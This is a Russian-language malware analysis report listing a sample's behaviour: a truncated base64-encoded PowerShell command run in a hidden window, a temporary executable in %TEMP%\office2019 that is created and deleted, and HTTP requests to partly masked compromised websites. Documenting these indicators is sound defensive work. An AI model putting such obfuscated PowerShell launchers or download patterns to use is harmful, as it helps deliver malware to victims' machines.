Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAGgAMABjAGYAdAAzAD0AKAAnAFUAOABuAHoAJwArACcAagBnACcAKwAnAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBwAFwATwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\office2019\vd5v650.exe
Удаляет следующие файлы
- %TEMP%\office2019\vd5v650.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://uk##ian.com/wp-admin/Znk3yozl/
- http://te###ala.net/wp-admin/tKX319361/
- http://to###dry.com.ua/cgi-bin/dhH718397/
UDP
- DNS ASK uk##ian.com
- DNS ASK te###ala.net
- DNS ASK sc######lniki.eko-bart.pl
- DNS ASK mt#1.cn
- DNS ASK to###dry.com.ua
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAGgAMABjAGYAdAAzAD0AKAAnAFUAOABuAHoAJwArACcAagBnACcAKwAnAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBwAFwATwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)
